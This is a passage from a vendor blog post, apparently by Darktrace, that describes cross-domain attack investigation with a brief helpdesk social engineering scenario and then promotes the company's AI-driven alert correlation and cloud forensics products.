Helpdesk teams handling user requests over the phone require a different set of skills altogether. Imagine a threat actor posing as an employee and articulately requesting an urgent password reset or a temporary MFA deactivation. The junior Helpdesk agent, unfamiliar with the exception criteria, eager to help and feeling pressure from the persuasive manipulator at the end of the phone line, could easily fall victim to this type of social engineering.

Empowering analysts through intelligent automation

Even the most skilled analysts can’t manually piece together every strand of malicious activity stretching across domains. But skill alone isn’t enough. The biggest hurdle in investigating these attacks often comes down to whether the team have the time, context, and connected visibility needed to see the full picture.

Many organizations attempt to bridge the gap by stitching together a patchwork of security tools. One platform for email, another for endpoint, another for cloud, and so on. But this fragmentation reinforces the very silos that cross-domain attacks exploit. Logs must be exported, normalized, and parsed across tools, a process that is not only error-prone but slow. By the time indicators are correlated, the intrusion has often already deepened.

That’s why automation and AI are becoming indispensable. The future of cross-domain investigation lies in systems that can:

  • Automatically correlate activity across domains and data sources, turning disjointed alerts into a single, interpretable incident.
  • Generate and test hypotheses autonomously, identifying likely chains of malicious behaviour without waiting for human triage.
  • Explain findings in human terms, reducing the knowledge gap between junior and senior analysts.
  • Operate within and across hybrid environments, from on-premise networks to SaaS, IaaS, and identity systems.

This is where Darktrace transforms alerting and investigations. Darktrace’s Cyber AI Analyst automates the process of correlation, hypothesis testing, and narrative building, not just within one domain, but across many. An anomalous O365 login, a new S3 bucket, and a suspicious beaconing host are stitched together automatically, surfacing the story behind the alerts rather than leaving it buried in telemetry.

Figure 2: How threat activity is correlated in Cyber AI Analyst

By analyzing events from disparate tools and sources, AI Analyst constructs a unified timeline of activity showing what happened, how it spread, and where to focus next. For analysts, it means investigation time is measured in minutes, not days. For security leaders, it means every member of the SOC, regardless of experience, can contribute meaningfully to a cross-domain response.

Figure 3: Correlation showcasing cross domains (SaaS and IaaS) in Cyber AI Analyst

Until now, forensic investigations were slow, manual, and reserved for only the largest organizations with specialized DFIR expertise. Darktrace / Forensic Acquisition & Investigation changes that by leveraging the scale and elasticity of the cloud itself to automate the entire investigation process. From capturing full disk and memory at detection to reconstructing attacker timelines in minutes, the solution turns fragmented workflows into streamlined investigations available to every team.

What once took days now takes minutes. Now, forensic investigations in the cloud are faster, more scalable, and finally accessible to every security team, no matter their size or expertise.

About the author
Benjamin Druttman
Cyber Security AI Technical Instructor